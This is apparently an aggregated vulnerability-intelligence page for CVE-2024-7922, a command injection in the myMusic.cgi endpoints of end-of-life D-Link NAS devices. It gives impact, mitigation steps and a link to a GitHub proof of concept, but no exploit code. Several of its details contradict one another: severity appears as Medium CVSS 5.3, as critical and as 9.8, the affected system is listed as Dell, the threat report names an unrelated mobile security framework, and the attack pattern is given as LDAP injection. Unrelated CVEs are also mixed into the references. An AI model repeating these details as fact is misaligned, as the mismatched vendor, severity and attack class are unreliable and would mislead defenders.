Exploit
CVE-2024-7922

Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

Published: Aug 19, 2024 / Updated: 3mo ago

010
CVSS 5.3EPSS 0.04%Medium
CVE info copied to clipboard

Summary

A critical vulnerability has been identified in multiple D-Link NAS (Network Attached Storage) devices. The affected function is located in the file /cgi-bin/myMusic.cgi and includes several CGI endpoints such as cgi_audio_search, cgi_create_playlist, cgi_get_album_all_tracks, cgi_get_alltracks_editlist, cgi_get_artist_all_album, cgi_get_genre_all_tracks, cgi_get_tracks_list, cgi_set_airplay_content, and cgi_write_playlist. This vulnerability allows for command injection attacks.

Impact

The impact of this vulnerability is severe. It allows for remote command injection attacks, which can lead to unauthorized access, data theft, and complete system compromise. The attacker can execute arbitrary commands on the affected devices with the same privileges as the web server process. This could result in unauthorized data access, modification of system configurations, installation of malware, or use of the compromised device as a pivot point for further network attacks.

Exploitation

Multiple proof-of-concept exploits are available on github.com, github.com. There is no evidence of proof of exploitation at the moment.

Patch

A patch is not available for this vulnerability. The vendor, D-Link, has confirmed that the affected products are end-of-life and no longer supported. The recommendation is to retire and replace these devices.

Mitigation

Given that there is no patch available and the affected devices are end-of-life, the primary mitigation strategy is to replace these devices with newer, supported models. In the interim, if immediate replacement is not possible, consider the following temporary mitigation measures: 1. Isolate affected devices: Place the vulnerable NAS devices behind a firewall and restrict access to only necessary IP addresses and ports. 2. Disable remote access: If possible, disable remote access to the devices and only allow local network access. 3. Monitor for suspicious activity: Implement robust logging and monitoring for any unusual access attempts or activities on these devices. 4. Regular backups: Ensure all data on these devices is regularly backed up to secure, unaffected systems. 5. Accelerate replacement plans: Prioritize the replacement of these devices in your organization's hardware refresh cycle. It's crucial to emphasize that these mitigation strategies are temporary and the devices should be replaced as soon as possible to ensure the security of your network and data.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Timeline

First Article

Feedly found the first article mentioning CVE-2024-7922. See article

Aug 19, 2024 at 3:12 PM / CVE
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Aug 19, 2024 at 3:13 PM
Threat Intelligence Report

The vulnerability CVE-2024-7922 in Opensecurity Mobile Security Framework has a CVSS score of 9.8, indicating its criticality. It allows for command injection in various D-Link devices, potentially leading to unauthorized access or control. Mitigations and patches may be available, but downstream impacts to other third-party vendors using similar technology could be significant. See article

Aug 22, 2024 at 8:52 PM
CVSS

A CVSS base score of 9.8 has been assigned.

Oct 28, 2024 at 9:19 PM / nvd
Static CVE Timeline Graph

Affected Systems

Dell/dns-320_firmware
+null more

Exploits

https://github.com/BuaaIOTTeam/Iot_Dlink_NAS/blob/main/DNS_cgi_create_playlist.md
+null more

Patches

supportannouncement.us.dlink.com
+null more

Attack Patterns

CAPEC-136: LDAP Injection
+null more

References

@RISK: The Consensus Security Vulnerability Alert: Vol. 24, Num. 33 - SANS Institute
Product: Fabianros Job Portal CVSS Score: 9.8 NVD: NVD References: - - - - CVE-2024-7811 - SourceCodester Daily Expenses Monitoring App 1.0 is vulnerable to SQL injection in the /endpoint/delete-expense.php file, allowing for remote attacks due to the manipulation of the expense argument. Product: Wurmlab SequenceServer CVSS Score: 9.8 AtRiskScore 30 NVD: NVD References: - - CVE-2024-7794 - Itsoucecode Vehicle Management System 1.0 is vulnerable to a critical SQL injection flaw in the mybill.php file, allowing for remote attacks.

News

US-CERT Vulnerability Summary for the Week of August 19, 2024
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available. Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores: High : vulnerabilities with a CVSS base score of 7.0–10.0 Medium : vulnerabilities with a CVSS base score of 4.0–6.9 Low : vulnerabilities with a CVSS base score of 0.0–3.9 Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links.
Update Mon Aug 26 06:34:06 UTC 2024
Update Mon Aug 26 06:34:06 UTC 2024
Update Sat Aug 24 22:34:16 UTC 2024
Update Sat Aug 24 22:34:16 UTC 2024
Update Sat Aug 24 06:34:06 UTC 2024
Update Sat Aug 24 06:34:06 UTC 2024
Update Fri Aug 23 06:36:18 UTC 2024
Update Fri Aug 23 06:36:18 UTC 2024
See 12 more articles and social media posts

CVSS V3.1

Attack Vector:Network
Attack Complexity:Low
Privileges Required:None
User Interaction:None
Scope:Unchanged
Confidentiality:High
Integrity:High
Availability Impact:High

Categories

Be the first to know about critical vulnerabilities

Collect, analyze, and share vulnerability reports faster using AI